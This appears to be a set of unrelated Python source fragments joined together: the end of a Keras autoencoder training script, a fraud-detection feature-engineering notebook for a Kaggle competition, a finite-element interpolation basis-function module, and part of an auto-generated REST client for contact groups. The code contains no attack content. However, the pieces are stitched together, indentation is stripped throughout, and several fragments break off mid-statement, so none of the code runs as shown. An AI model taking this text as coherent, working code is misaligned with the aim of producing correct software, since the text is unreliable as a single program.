min_mean_valid_loss = mean_valid_loss
autoencoder.save('autoencoder.min.mdl')
np.save('alllosses.min.npy',np.concatenate(alllosses))
except KeyboardInterrupt:
pass
finally:
autoencoder.save('autoencoder.mdl')
if len(alllosses) >0: np.save('alllosses.npy',np.concatenate(alllosses))
#print dataset
#print dataset
#autoencoder.fit(x,y,epochs=50,steps_per_epoch=25,validation_data = (xv,yv),validation_steps=10)
if False:
input_img = Input(shape=(576, 504, 3)) # adapt this if using `channels_first` image data format
x = Conv2D(16, (3, 3), activation='relu', padding='same')(input_img)
x = MaxPooling2D((2, 2), padding='same')(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
x = MaxPooling2D((2, 2), padding='same')(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
x = MaxPooling2D((2, 2), padding='same')(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
x = MaxPooling2D((2, 2), padding='same')(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
x = MaxPooling2D((2, 2), padding='same')(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
encoded = MaxPooling2D((2, 2), padding='same')(x)
#encoded = MaxPooling2D((2, 2), padding='same')(x)
#print encoded.shape
# at this point the representation is (4, 4, 8) i.e. 128-dimensional
x = Conv2D(8, (3, 3), activation='relu', padding='same')(encoded)
x = UpSampling2D((2, 2))(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
x = UpSampling2D((2, 2))(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
x = UpSampling2D((2, 2))(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
x = UpSampling2D((2, 2))(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
x = UpSampling2D((2, 2))(x)
x = Conv2D(16, (3, 3), activation='relu', padding='same')(x)
| |
<gh_stars>10-100
# coding: utf-8
# In[853]:
# for C4, C6, C7, C8, C10 outliers, lookit cat variables to see if we can identify groupings...
#C8,c10 we can kinda tell, 0.51
# C12=0.553
# Hard winsorize:
traintr.loc[traintr.D4>484,'D4'] = 485
testtr.loc[testtr.D4>484,'D4'] = 485
data.loc[data.D4>484,'D4'] = np.nan
test_cvs(data, 'D4')
traintr['look'] = traintr.C1 + traintr.C2 + traintr.C11
testtr['look'] = testtr.C1 + testtr.C2 + testtr.C11
START_DATE = '2017-12-01'
startdate = datetime.datetime.strptime(START_DATE, '%Y-%m-%d')
traintr['tdt'] = traintr['TransactionDT'].apply(lambda x: (startdate + datetime.timedelta(seconds = x)))
traintr['tmonth'] = traintr.tdt.dt.month
import pandas as pd
import numpy as np
from time import time
import datetime
import lightgbm as lgb
import gc, warnings
gc.collect()
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import precision_score, recall_score, confusion_matrix, accuracy_score
from sklearn.metrics import roc_auc_score, f1_score, roc_curve, auc,precision_recall_curve
from scipy import interp
import matplotlib.pyplot as plt
import seaborn as sns
from tqdm import tqdm
# In[278]:
id_30_dates = {
# https://en.wikipedia.org/wiki/Android_version_history
'Android 4.4.2':'2012-11-13',
'Android 5.0':'2014-11-12',
'Android 5.0.2':'2014-12-19',
'Android 5.1.1':'2015-04-21',
'Android 6.0':'2015-10-05',
'Android 6.0.1':'2015-12-07',
'Android 7.0':'2016-08-22',
'Android 7.1.1':'2016-12-05',
'Android 7.1.2':'2017-04-04',
'Android 8.0.0':'2017-08-21',
'Android 8.1.0':'2017-12-05',
'Android 9':'2018-08-06',
'Windows XP':'2001-10-25',
'Windows Vista':'2006-11-08',
'Windows 7':'2009-10-22',
'Windows 8':'2012-10-26',
'Windows 8.1':'2013-10-17',
'Windows 10':'2015-07-29',
# https://robservatory.com/a-useless-analysis-of-os-x-release-dates/
'Mac OS X 10.6': '2009-08-28',
'Mac OS X 10_6_8': '2011-06-23',
'Mac OS X 10_7_5': '2012-09-19',
'Mac OS X 10_8_5': '2013-09-12',
'Mac OS X 10.9': '2013-10-22',
'Mac OS X 10_9_5': '2014-09-17',
'Mac OS X 10.10': '2014-10-16',
'Mac OS X 10_10_5': '2015-08-13',
'Mac OS X 10.11': '2015-09-30',
'Mac OS X 10_11_3': '2016-01-19',
'Mac OS X 10_11_4': '2016-03-20',
'Mac OS X 10_11_5': '2016-05-16',
'Mac OS X 10_11_6': '2016-07-18',
'Mac OS X 10.12': '2016-09-20',
'Mac OS X 10_12': '2016-09-20',
'Mac OS X 10_12_1': '2016-10-24',
'Mac OS X 10_12_2': '2016-12-13',
'Mac OS X 10_12_3': '2017-01-23',
'Mac OS X 10_12_4': '2017-03-27',
'Mac OS X 10_12_5': '2017-05-15',
'Mac OS X 10_12_6': '2017-07-19',
'Mac OS X 10.13': '2017-09-25',
'Mac OS X 10_13_1': '2017-10-31',
'Mac OS X 10_13_2': '2017-12-06',
'Mac OS X 10_13_3': '2018-01-23',
'Mac OS X 10_13_4': '2018-03-29',
'Mac OS X 10_13_5': '2018-06-01',
'Mac OS X 10_13_6': '2018-07-09',
'Mac OS X 10.14': '2018-09-24',
'Mac OS X 10_14': '2018-09-24',
'Mac OS X 10_14_0': '2018-09-24',
'Mac OS X 10_14_1': '2018-10-30',
'Mac OS X 10_14_2': '2018-12-05',
'iOS 9.3.5':'2016-08-25',
'iOS 10.0.2':'2016-09-23',
'iOS 10.1.1':'2016-10-31',
'iOS 10.2.0':'2016-12-12',
'iOS 10.2.1':'2017-01-23',
'iOS 10.3.1':'2017-04-03',
'iOS 10.3.2':'2017-05-15',
'iOS 10.3.3':'2017-07-19',
'iOS 11.0.0':'2017-08-19',
'iOS 11.0.1':'2017-08-26',
'iOS 11.0.2':'2017-10-03',
'iOS 11.0.3':'2017-10-11',
'iOS 11.1.0':'2017-10-31',
'iOS 11.1.1':'2017-11-08',
'iOS 11.1.2':'2017-11-16',
'iOS 11.2.0':'2017-12-02',
'iOS 11.2.1':'2017-12-13',
'iOS 11.2.2':'2018-01-08',
'iOS 11.2.5':'2018-01-23',
'iOS 11.2.6':'2018-02-19',
'iOS 11.3.0':'2018-03-29',
'iOS 11.3.1':'2018-04-24',
'iOS 11.4.0':'2018-05-29',
'iOS 11.4.1':'2018-07-09',
'iOS 12.0.0':'2018-08-17',
'iOS 12.0.1':'2018-09-08',
'iOS 12.1.0':'2018-09-30',
'iOS 12.1.1':'2018-12-05',
'iOS 12.1.2':'2018-12-20',
}
id_30_dates = {k.lower():v for k,v in id_30_dates.items()}
# # Various FE
# In[2]:
def build_ranges(ranges):
out = []
for arange in ranges:
out.append(np.arange(arange[0], arange[-1]+1, 1).tolist())
return sum(out, [])
def target_mean_encode(data, col):
encode = data.groupby(col).isFraud.mean().sort_values(ascending=False).reset_index()
mapper = {k:v for v, k in enumerate(encode[col].values)}
data[col] = data[col].map(mapper)
return data, mapper
tt = time()
def updateme(msg, reset=False):
global tt
if reset: tt = time()
print(time()-tt, msg)
tt = time()
# In[287]:
def build_features(trx,idn):
updateme('Mergind DFrame + Computing NANs')
trx['nulls_trx'] = trx.isna().sum(axis=1)
idn['nulls_idn'] = idn.isna().sum(axis=1)
data = trx.merge(idn, how='left', on='TransactionID')
old_features = [c for c in data.columns if c not in ['nulls_trx', 'nulls_idn']]
# Make sure everything is lowercase
for c1, c2 in data.dtypes.reset_index().values:
if not c2=='O': continue
data[c1] = data[c1].astype(str).apply(str.lower)
updateme('Building Groups')
stringy = lambda x: x.astype(str) + ' '
data['CardID'] = stringy(data.card1) + stringy(data.card2) + stringy(data.card3) + stringy(data.card4) + stringy(data.card5) + stringy(data.card6) + stringy(data.addr1) # + stringy(data.addr2) # Sergey says addr1 only: https://www.kaggle.com/c/ieee-fraud-detection/discussion/101785#latest-588573
data['DeviceID'] = stringy(data.DeviceType) + stringy(data.DeviceInfo) + stringy(data.id_31) # TODO: Clean
data['PAccountID'] = stringy(data.addr1) + stringy(data.addr2) + stringy(data.P_emaildomain)
data['RAccountID'] = stringy(data.addr1) + stringy(data.addr2) + stringy(data.R_emaildomain)
updateme('Count Encoding Groups')
# TODO: Try count + label encode (e.g. both)
for col in ['nulls_idn', 'nulls_trx', 'CardID', 'DeviceID', 'PAccountID', 'RAccountID', 'ProductCD']:
data[col] = data[col].map(data[col].value_counts(dropna=False))
updateme('Count Encoding Vars')
count_encode = ['card1', 'id_34', 'id_36', 'TransactionAmt']
for col in count_encode:
data['CountEncode_' + col] = data[col].map(data[col].value_counts(dropna=False))
updateme('Email Features')
data['TransactionAmtCents'] = np.ceil(data.TransactionAmt) - np.floor(data.TransactionAmt)
country_map = {
'com':'us', 'net':'us', 'edu':'us', 'gmail':'us',
'mx': 'mx', 'es':'es', 'de':'de', 'fr':'fr',
'uk':'uk', 'jp':'jp'
}
domain = lambda x: x.split('.')[0]
pemail_country = lambda x: x.split('.')[-1]
data['pemail_domain'] = data.P_emaildomain.astype(str).apply(domain)
data['pemail_ext'] = data.P_emaildomain.astype(str).apply(pemail_country).map(country_map)
data['remail_domain'] = data.R_emaildomain.astype(str).apply(domain)
data['remail_ext'] = data.R_emaildomain.astype(str).apply(pemail_country).map(country_map)
data['p_and_r_email'] = data.P_emaildomain.astype(str) + ' ' + data.R_emaildomain.astype(str)
updateme('Time Features')
# We can calculate transaction hour directly;
# But samples where D9 isna seem to have less fraud rate. And there's a LOT of them:
data.D9 = data.D9.isnull()
# Time deltas Mod7 and mod(7*4)
for i in range(1,16):
if i in [8,9]: continue
temp = data['D'+str(i)] % 7
temp.loc[data['D'+str(i)]==0] = -1
data['D{}_mod7'.format(i)] = temp.values
slope = 1 / (60*60*24) # sec/day
for i in range(1,16):
if i in [9]: continue
feature = 'D' + str(i)
data[feature+'_mfix'.format(i)] = np.round_(data[feature] - (data.TransactionDT - data.TransactionDT.min()) * slope)
data[feature+'_mfix_mod7'.format(i)] = data[feature+'_mfix'.format(i)] % 7
START_DATE = '2017-12-01'
startdate = datetime.datetime.strptime(START_DATE, '%Y-%m-%d')
data['tdt'] = data['TransactionDT'].apply(lambda x: (startdate + datetime.timedelta(seconds = x)))
data['tdow'] = data.tdt.dt.dayofweek
data['thour'] = data.tdt.dt.hour
data['tdate'] = data.tdt.dt.date
# TODO: Add holidays.
# @9h, id_01 is the least
# @18h, id_02 is the least
data['thour_id_01'] = ((np.abs(9 - data.thour) % 12) + 1) * (data.id_01 + 1)
data['thour_id_02'] = ((np.abs(18 - data.thour) % 12) + 1) * (data.id_02 + 1)
# Groups:
updateme('Group Aggregates')
# I'm also trying features like HourTransactionVolume, DayTransactionVolume, etc, but they are not very promising. They tend to increase cv, but decreases lb. I hope this inspires you.
# temp = data.groupby(['thour','tdate']).size().reset_index()
# temp.rename(columns={0:'trans_per_hourdate'}, inplace=True)
# data = data.merge(temp, how='left', on=['thour','tdate'])
temp = data.groupby('thour').size().reset_index()
temp.rename(columns={0:'trans_per_hour'}, inplace=True)
data = data.merge(temp, how='left', on='thour')
cat = 'CardID'
grp = data.groupby(cat)
temp = grp.id_02.agg(['min','std'])
temp.columns = ['G{}_{}_{}'.format(cat, 'id_02', col) for col in ['min','std']]
data = data.merge(temp, how='left', on=cat)
temp = grp.C13.agg(['std'])
temp.columns = ['G{}_{}_{}'.format(cat, 'C13', col) for col in ['std']]
data = data.merge(temp, how='left', on=cat)
temp = grp.TransactionAmt.agg(['max'])
temp.columns = ['G{}_{}_{}'.format(cat, 'TransactionAmt', col) for col in ['max']]
data = data.merge(temp, how='left', on=cat)
temp = grp.D1_mfix.agg(['max'])
temp.columns = ['G{}_{}_{}'.format(cat, 'D1_mfix', col) for col in ['max']]
data = data.merge(temp, how='left', on=cat)
cat = 'PAccountID'
grp = data.groupby(cat)
temp = grp.dist1.agg(['max', 'std'])
temp.columns = ['G{}_{}_{}'.format(cat, 'dist1', col) for col in ['max', 'std']]
data = data.merge(temp, how='left', on=cat)
cat = 'nulls_trx'
grp = data.groupby(cat)
temp = grp.id_02.agg(['max'])
temp.columns = ['G{}_{}_{}'.format(cat, 'id_02', col) for col in ['max']]
data = data.merge(temp, how='left', on=cat)
temp = grp.C13.agg(['max'])
temp.columns = ['G{}_{}_{}'.format(cat, 'C13', col) for col in ['max']]
data = data.merge(temp, how='left', on=cat)
cat = 'thour'
temp = data.groupby(cat).TransactionAmt.agg(['min','max','mean','median','std'])
temp.columns = ['G{}_{}_{}'.format(cat, 'TransactionAmt', col) for col in ['min','max','mean','median','std']]
data = data.merge(temp, how='left', on=cat)
cat = 'addr1'
temp = data.groupby(cat).TransactionAmt.agg(['min','max','mean','median','std'])
temp.columns = ['G{}_{}_{}'.format(cat, 'TransactionAmt', col) for col in ['min','max','mean','median','std']]
data = data.merge(temp, how='left', on=cat)
cat = 'card5'
temp = data.groupby(cat).TransactionAmt.agg(['min','max','mean','median','std'])
temp.columns = ['G{}_{}_{}'.format(cat, 'TransactionAmt', col) for col in ['min','max','mean','median','std']]
data = data.merge(temp, how='left', on=cat)
# End Groups
# IDEA here is (proven garbage with M5 and D1):
# Access from outside your country. (IP and browser language settings, time zone) (M? x D? interactions)
#data['M5_D1_mfix'] = (data.M5.map({'F':2, 'T':1, np.nan:0})+1).astype(np.float) * (data.D1_mfix-data.D1_mfix.min()+1).astype(np.float)
updateme('OHEs...')
# These just have fun isFraud means
OHEFeatures = {
'P_emaildomain': 'protonmail.com',
'R_emaildomain': 'protonmail.com',
'card2': 176,
#'addr2': 65,
#'V283': 17,
#'V37': 8,
#'V45': 4,
}
for key, val in OHEFeatures.items(): data['OHE_'+key] = data[key]==val
# During labeling the categorical values, protonmail.com tends to come up in others. Instead use this as another label. This gained me +0.120.
# addr1, addr2 <-- something in there. Also look at dist1 with these
# dist1 is probably dist from last transaction location
# These guys have the SAME value_count distribution per key as well!
# V126-V137 looks interesting. maybe a dollar amount or a distance
# V160-V166 similar to above
# V202-V206 similar
# V207-V216 similar
# V263-V278 similar
# V306-V321 similar
# V331-V339 similar
cols = ['V' + str(col) for col in build_ranges([
[126,137],
[160,166],
[202,216],
[263,278],
[306,321],
[331,339],
])]
#traintr['VSUM1'] = traintr.V130+traintr.V133+traintr.V136
#data['dollar_weirdness'] = data[cols].apply(lambda x: np.unique(x).shape[0], axis=1)
#data['weirdness'] = data[continuous].apply(lambda x: np.unique(x).shape[0], axis=1)
# V167-V168, V170 has similar distro
# V153-V158
# # Mean value of | |
import numpy
import numpy.linalg
def weights(basis, X, deriv=None):
"""
Calculates the interpolant value or derivative weights for points X.
:param basis: interpolation function in each direction, eg,
``['L1', 'L1']`` for bilinear.
:type basis: list of strings
:param X: locations to calculate interpolant weights
:type X: list or numpy array (npoints, ndims)
:param deriv: derivative in each dimension, e.g., ``deriv=[1, 1]``
:type deriv: list of integers
:return: basis weights (ndims)
:rtype: numpy array, size: (npoints, nweights)
>>> import numpy
>>> x = numpy.array([[0.13, 0.23], [0.77, 0.06]])
>>> weights(['L1', 'L2'], x, deriv=[0, 1])
array([[-1.8096, -0.2704, 1.8792, 0.2808, -0.0696, -0.0104],
[-0.6348, -2.1252, 0.8096, 2.7104, -0.1748, -0.5852]])
"""
basis_functions, dimensions = _get_basis_functions(basis, deriv)
X = _process_x(X, dimensions)
W = []
for bf in basis_functions:
if bf[0].__name__[0] == 'T':
W.append(bf[0](X[:, bf[1]]))
else:
W.append(bf[0](X[:, bf[1]])[0])
BPInd = _get_basis_product_indices(basis, dimensions, W)
if BPInd is None:
return W[0]
WW = numpy.zeros((X.shape[0], len(BPInd)))
if dimensions == 3:
for ind, ii in enumerate(BPInd):
WW[:, ind] = W[0][:, ii[0]] * W[1][:, ii[1]] * W[2][:, ii[2]]
else:
for ind, ii in enumerate(BPInd):
WW[:, ind] = W[0][:, ii[0]] * W[1][:, ii[1]]
return WW
def _get_basis_product_indices(basis, dimensions, W):
"""
Returns the indicies for the product between the weights for each
interpolant for basis functions.
"""
BPInd = None
if dimensions == 1:
return None
elif dimensions == 2:
if basis[0][0] == 'T':
return None
elif len(basis) == 2:
if (basis[0][0] == 'L' and basis[1][0] == 'L') or \
(basis[0][0] == 'L' and basis[1][0] == 'H') or \
(basis[0][0] == 'H' and basis[1][0] == 'L'):
BPInd = []
for ind1 in range(W[1].shape[1]):
for ind0 in range(W[0].shape[1]):
BPInd.append([ind0, ind1])
elif basis == ['H3', 'H3']:
BPInd = [[0, 0], [1, 0], [0, 1], [1, 1],
[2, 0], [3, 0], [2, 1], [3, 1],
[0, 2], [1, 2], [0, 3], [1, 3],
[2, 2], [3, 2], [2, 3], [3, 3]]
else:
raise ValueError('Basis combination not supported')
elif dimensions == 3:
if len(basis) == 3:
if (basis[0][0] == 'L' and basis[1][0] == 'L' and basis[2][0] == 'L'):
BPInd = []
for ind2 in range(W[2].shape[1]):
for ind1 in range(W[1].shape[1]):
for ind0 in range(W[0].shape[1]):
BPInd.append([ind0, ind1, ind2])
elif basis == ['H3', 'H3', 'H3']:
BPInd = [
[0, 0, 0], [1, 0, 0], [0, 1, 0], [1, 1, 0],
[0, 0, 1], [1, 0, 1], [0, 1, 1], [1, 1, 1],
[2, 0, 0], [3, 0, 0], [2, 1, 0], [3, 1, 0],
[2, 0, 1], [3, 0, 1], [2, 1, 1], [3, 1, 1],
[0, 2, 0], [1, 2, 0], [0, 3, 0], [1, 3, 0],
[0, 2, 1], [1, 2, 1], [0, 3, 1], [1, 3, 1],
[2, 2, 0], [3, 2, 0], [2, 3, 0], [3, 3, 0],
[2, 2, 1], [3, 2, 1], [2, 3, 1], [3, 3, 1],
[0, 0, 2], [1, 0, 2], [0, 1, 2], [1, 1, 2],
[0, 0, 3], [1, 0, 3], [0, 1, 3], [1, 1, 3],
[2, 0, 2], [3, 0, 2], [2, 1, 2], [3, 1, 2],
[2, 0, 3], [3, 0, 3], [2, 1, 3], [3, 1, 3],
[0, 2, 2], [1, 2, 2], [0, 3, 2], [1, 3, 2],
[0, 2, 3], [1, 2, 3], [0, 3, 3], [1, 3, 3],
[2, 2, 2], [3, 2, 2], [2, 3, 2], [3, 3, 2],
[2, 2, 3], [3, 2, 3], [2, 3, 3], [3, 3, 3]]
else:
raise ValueError('Basis combination not supported')
else:
raise ValueError('Basis combination not supported')
else:
raise ValueError('%d dimensions not supported' % (len(basis)))
return BPInd
def _get_basis_functions(basis, deriv):
"""
Returns a list of interpolation function for the interpolation
definition and derivatives specified by the user. Also returns the
number of dimensions as defined in the basis parameter.
"""
# List of basis functions
bsfn_list = {
'L1': [L1, L1d1, L1d1d1],
'L2': [L2, L2d1],
'L3': [L3, L3d1],
'L4': [L4, L4d1],
'H3': [H3, H3d1, H3d1d1],
'T11': [T11],
'T22': [T22],
'T33': [T33, T33d1, T33d2],
'T44': [T44, T44d1, T44d2]}
# Set the index of the basis function in BFn from the deriv input
di = []
if deriv == None:
for bs in basis:
di.append(0)
else:
ind = 0
for bs in basis:
if bs[0] == 'T':
if deriv[ind:ind+2] == [0, 0]:
di.append(0)
elif deriv[ind:ind+2] == [1, 0]:
di.append(1)
elif deriv[ind:ind+2] == [0, 1]:
di.append(2)
else:
raise ValueError(
'Derivative (%d) for %s basis not implemented' %
(ind, bs))
ind += 2
else:
di.append(deriv[ind])
ind += 1
# Set the basis functions pointers and index in X for each basis in
# the basis input
dimensions = 0
basis_functions = []
for ind, bs in enumerate(basis):
if bs[0] == 'T':
if bs in bsfn_list.keys():
basis_functions.append([bsfn_list[bs][di[ind]],
[dimensions, dimensions + 1]])
dimensions += 2
else:
if bs in bsfn_list.keys():
basis_functions.append([bsfn_list[bs][di[ind]],
[dimensions]])
dimensions += 1
return basis_functions, dimensions
def _process_x(X, dimensions):
"""
Converts the X parameter to the correct numpy array for the
interpolation functions. The return numpy array should be size
(npoints, ndims).
"""
# Converting X to a numpy array if the input is a list
if isinstance(X, list):
if isinstance(X[0], list):
X = numpy.array([x for x in X])
else:
if dimensions == 1:
X = numpy.array([[x for x in X]]).T
else:
X = numpy.array([x for x in X])
if X.shape[1] != dimensions:
raise ValueError(
'X dimensions does not match the number of basis')
return X
# Lagrange basis functions
def L1(x):
"""
Linear lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array (npoints, 2)
"""
return numpy.array([1. - x, x]).T
def L1d1(x):
"""
First derivative for the linear lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array (npoints, 2)
"""
W = numpy.ones((x.shape[0], 2))
W[:, 0] -= 2
return numpy.array([W])
def L1d1d1(x):
"""
Second derivative for the linear lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array (npoints, 2)
"""
return numpy.zeros((x.shape[0], 2))
def L2(x):
"""
Quadratic lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array(npoints, 3)
"""
L1, L2 = 1-x, x
Phi = numpy.array([
L1 * (2.0 * L1 - 1),
4.0 * L1 * L2,
L2 * (2.0 * L2 - 1)])
return Phi.T
def L2d1(x):
"""
First derivative of the quadratic lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array(npoints, 3)
"""
L1 = 1-x
return numpy.array([
1.0 - 4.0 * L1,
4.0 * L1 - 4.0 * x,
4.0 * x - 1.]).T
# .. todo: L2dxdx
def L3(x):
"""
Cubic lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array(npoints, 4)
"""
L1, L2 = 1-x, x
sc = 9./2.
return numpy.array([
0.5*L1*(3*L1-1)*(3*L1-2),
sc*L1*L2*(3*L1-1),
sc*L1*L2*(3*L2-1),
0.5*L2*(3*L2-1)*(3*L2-2)]).T
def L3d1(x):
"""
First derivative of the cubic lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array(npoints, 4)
"""
L1 = x*x
return numpy.array([
-(27.*L1-36.*x+11.)/2.,
(81.*L1-90.*x+18.)/2.,
-(81.*L1-72.*x+9.)/2.,
(27.*L1-18.*x+2.)/2.]).T
# .. todo: L3dxdx
def L4(x):
"""
Quartic lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array(npoints, 5)
"""
sc = 1/3.
x2 = x*x
x3 = x2*x
x4 = x3*x
return numpy.array([
sc*(32*x4-80*x3+70*x2-25*x+3),
sc*(-128*x4+288*x3-208*x2+48*x),
sc*(192*x4-384*x3+228*x2-36*x),
sc*(-128*x4+224*x3-112*x2+16*x),
sc*(32*x4-48*x3+22*x2-3*x)]).T
def L4d1(x):
"""
First derivative of the quartic lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array(npoints, 5)
"""
sc = 1/3.
x2 = x*x
x3 = x2*x
return numpy.array([ \
sc*(128*x3-240*x2+140*x-25), \
sc*(-512*x3+864*x2-416*x+48), \
sc*(768*x3-1152*x2+456*x-36), \
sc*(-512*x3+672*x2-224*x+16), \
sc*(128*x3-144*x2+44*x-3)]).T
# .. todo: L4d2
# Hemite basis functions
def H3(x):
"""
Cubic-Hermite basis function.
| |
delete_group" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'group_id' is set
if self.api_client.client_side_validation and ('group_id' not in local_var_params or # noqa: E501
local_var_params['group_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `group_id` when calling `delete_group`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group_id' in local_var_params:
path_params['groupId'] = local_var_params['group_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/groups/{groupId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_groups(self, **kwargs): # noqa: E501
"""Get all Contact Groups in paginated format # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_groups(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param datetime before: Filter by created at before the given timestamp
:param int page: Optional page index in list pagination
:param datetime since: Filter by created at after the given timestamp
:param int size: Optional page size in list pagination
:param str sort: Optional createdAt sort direction ASC or DESC
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: PageGroupProjection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_all_groups_with_http_info(**kwargs) # noqa: E501
def get_all_groups_with_http_info(self, **kwargs): # noqa: E501
"""Get all Contact Groups in paginated format # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_groups_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param datetime before: Filter by created at before the given timestamp
:param int page: Optional page index in list pagination
:param datetime since: Filter by created at after the given timestamp
:param int size: Optional page size in list pagination
:param str sort: Optional createdAt sort direction ASC or DESC
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(PageGroupProjection, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'before',
'page',
'since',
'size',
'sort'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_groups" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'before' in local_var_params and local_var_params['before'] is not None: # noqa: E501
query_params.append(('before', local_var_params['before'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'since' in local_var_params and local_var_params['since'] is not None: # noqa: E501
query_params.append(('since', local_var_params['since'])) # noqa: E501
if 'size' in local_var_params and local_var_params['size'] is not None: # noqa: E501
query_params.append(('size', local_var_params['size'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/groups/paginated', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageGroupProjection', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_group(self, group_id, **kwargs): # noqa: E501
"""Get group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_group(group_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str group_id: groupId (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GroupDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_group_with_http_info(group_id, **kwargs) # noqa: E501
def get_group_with_http_info(self, group_id, **kwargs): # noqa: E501
"""Get group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_group_with_http_info(group_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str group_id: groupId (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GroupDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'group_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_group" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'group_id' is set
if self.api_client.client_side_validation and ('group_id' not in local_var_params or # noqa: E501
local_var_params['group_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `group_id` when calling `get_group`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group_id' in local_var_params:
path_params['groupId'] = local_var_params['group_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/groups/{groupId}', 'GET',
path_params,
